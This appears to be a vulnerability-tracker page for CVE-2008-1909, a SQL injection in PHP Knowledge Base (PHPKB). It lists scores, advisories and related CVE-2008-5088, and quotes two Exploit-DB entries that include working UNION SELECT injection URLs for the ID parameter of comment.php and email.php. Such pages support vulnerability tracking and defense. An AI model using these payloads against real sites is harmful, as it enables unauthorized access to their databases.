CVE-2008-1909
Published: 2008-04-22
Priority: P3 (40) | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available
EPSS: 0.99% (58.1th percentile)
SQL injection vulnerability in comment.php in PHP Knowledge Base (PHPKB) 1.5 and 2.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
Affected (3 ranges)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chadha_software_technologies | phpkb_knowledge_base | — | — |
| chadha_software_technologies | phpkb_knowledge_base | — | — |
| knowledgebase-script | phpkb_knowledge_base_software | — | — |
GHSA
GHSA-wv3m-v2c5-fj5x: Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-5088 [HIGH] CWE-89
Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID parameter to (1) email.php and (2) question.php, a different vector than CVE-2008-1909.
GHSA
GHSA-2p24-r54g-2p7g: SQL injection vulnerability in comment
ghsa_unreviewed·2022-05-01
CVE-2008-1909 [HIGH] CWE-89
SQL injection vulnerability in comment.php in PHP Knowledge Base (PHPKB) 1.5 and 2.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
No detection rules found.
Exploit-DB
PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
exploitdb·2010-05-10
CVE-2008-5088
---
[+] {In The Name Of Allah The Mercifull}
[+]
[~] Tybe: PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities
[~] Vendor: www.knowledgebase-script.com
[+] Software:PHPKB Knowledge Base Software v2 Multilanguage Support
[-]
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5))
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 04:15 am GMT
[?] Home: © Offensive Security
[?]
[?]
[-]{DEV!L'5 of SYST3M}
# SQL Injection #1 - email.php ID
[*] Err0r C0N50L3:
http://127.0.0.1/email.php?ID={EV!L EXPLO!T}
[*]{EV!L EXPLO!T}
1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
# SQL Injection #2 - comment.ph
Exploit-DB
PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection
exploitdb·2008-04-11
CVE-2008-1909
---
PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
# Author : parad0x
# Home : www.inso.host.sk
# Script : PHPKB Knowledge Base Software
# Script Homepage : http://www.knowledgebase-script.com
http://[target]/comment.php?ID=[SQL]
Example:
http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
greetz : VoLqaN
# milw0rm.com [2008-04-11]
http://secunia.com/advisories/29791
http://www.securityfocus.com/bid/28739
https://exchange.xforce.ibmcloud.com/vulnerabilities/41769
https://www.exploit-db.com/exploits/5428
Published: 2008-04-22